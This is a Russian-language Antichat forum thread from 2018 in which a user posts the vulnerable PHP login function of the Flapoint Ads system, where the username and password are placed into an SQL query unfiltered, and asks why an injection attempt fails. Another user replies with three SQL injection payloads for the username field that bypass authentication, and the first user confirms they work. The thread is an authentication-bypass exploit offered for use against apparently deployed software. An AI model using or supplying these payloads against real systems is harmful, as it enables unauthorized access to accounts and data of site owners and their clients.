Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   SQL-inj в авторизации (https://forum.antichat.xyz/showthread.php?t=460281)

FriLL 07.02.2018 14:32
Взгляните пожалуйста на код

Переменные $fla_ads_username и $fla_ads_password не имеют фильтрации

Но попытки из серии admin') OR 1=1+--+ успеха не приносят

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]fla_ads_Login[/COLOR][COLOR="#007700"]()
{
 global[/COLOR][COLOR="#0000BB"]$fla_ads_tbl_clients[/COLOR][COLOR="#007700"];
 global[/COLOR][COLOR="#0000BB"]$fla_ads_username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$fla_ads_password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$fla_ads_cookiecheck[/COLOR][COLOR="#007700"];
 global[/COLOR][COLOR="#0000BB"]$strPasswordWrong[/COLOR][COLOR="#007700"];
 global[/COLOR][COLOR="#0000BB"]$session_id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]//echo $fla_ads_username."
";
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]fla_ads_SuppliedCredentials[/COLOR][COLOR="#007700"]())
 {
 if ([/COLOR][COLOR="#0000BB"]$session_id[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$fla_ads_cookiecheck[/COLOR][COLOR="#007700"])
 {
[/COLOR][COLOR="#FF8000"]// Cookiecheck failed
[/COLOR][COLOR="#0000BB"]$session_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fla_ads_SessionStart[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]fla_ads_LoginScreen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"You need to enable cookies before you can use Flapoint Ads"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$session_id[/COLOR][COLOR="#007700"]);
 }
[/COLOR][COLOR="#FF8000"]// HEmtemp
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]fla_ads_isAdmin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fla_ads_username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$fla_ads_password[/COLOR][COLOR="#007700"]))
 {
[/COLOR][COLOR="#FF8000"]// User is Administrator
[/COLOR][COLOR="#007700"]return (array ([/COLOR][COLOR="#DD0000"]"usertype"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]fla_ads_Admin[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"loggedin"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"true"[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"username"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$fla_ads_username[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"password"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$fla_ads_password[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"stats_compact"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"false"[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"stats_view"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"all"[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"stats_order"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"banner_id"[/COLOR][COLOR="#007700"])
 );
 }
 else
{
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT client_id,permissions,language FROM[/COLOR][COLOR="#0000BB"]$fla_ads_tbl_clients[/COLOR][COLOR="#DD0000"]WHERE (BINARY client_user_name = BINARY '[/COLOR][COLOR="#0000BB"]$fla_ads_username[/COLOR][COLOR="#DD0000"]') AND (BINARY client_password = BINARY '[/COLOR][COLOR="#0000BB"]$fla_ads_password[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]db_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]) or[/COLOR][COLOR="#0000BB"]mysql_die[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#FF8000"]////echo $query;
////echo "#" . mysql_num_rows($res) . "#";
////exit;

[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]) >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$fla_ads_username[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$fla_ads_password[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])
 {
[/COLOR][COLOR="#FF8000"]// User found with correct password
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);
return (array ([/COLOR][COLOR="#DD0000"]"usertype"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]fla_ads_Client[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"loggedin"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"true"[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"username"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$fla_ads_username[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"password"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$fla_ads_password[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"client_id"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'client_id'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#DD0000"]"permissions"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'permissions'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#DD0000"]"language"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#DD0000"]"stats_compact"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"false"[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"stats_view"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"all"[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"stats_order"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"banner_id"[/COLOR][COLOR="#007700"])
 );
 }
 else
{
[/COLOR][COLOR="#FF8000"]// Password is not correct or user is not known
// Set the session ID now, some server do not support setting a cookie during a redirect
[/COLOR][COLOR="#0000BB"]$session_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fla_ads_SessionStart[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]fla_ads_LoginScreen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$strPasswordWrong[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$session_id[/COLOR][COLOR="#007700"]);
 }
 }
 }
 else
{
[/COLOR][COLOR="#FF8000"]// User has not supplied credentials yet
// Set the session ID now, some server do not support setting a cookie during a redirect
[/COLOR][COLOR="#0000BB"]$session_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fla_ads_SessionStart[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]fla_ads_LoginScreen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$session_id[/COLOR][COLOR="#007700"]);
 }
}
[/COLOR][/COLOR

crlf 07.02.2018 17:42
Код:
Code:
admin') -- 1
admin') AND 1=1 -- 1
blabla') OR 1=1 LIMIT 0,1 -- 1
Пароль не должен быть пустым. Дальнейшей логики не видно, возможно, есть ещё какие-нибудь чеки переданных данных.

FriLL 07.02.2018 18:21
Цитата:
Сообщение от crlf
crlf said:

Код:
Code:
admin') -- 1
admin') AND 1=1 -- 1
blabla') OR 1=1 LIMIT 0,1 -- 1
Пароль не должен быть пустым. Дальнейшей логики не видно, возможно, есть ещё какие-нибудь чеки переданных данных.
Работает)


Время: 13:23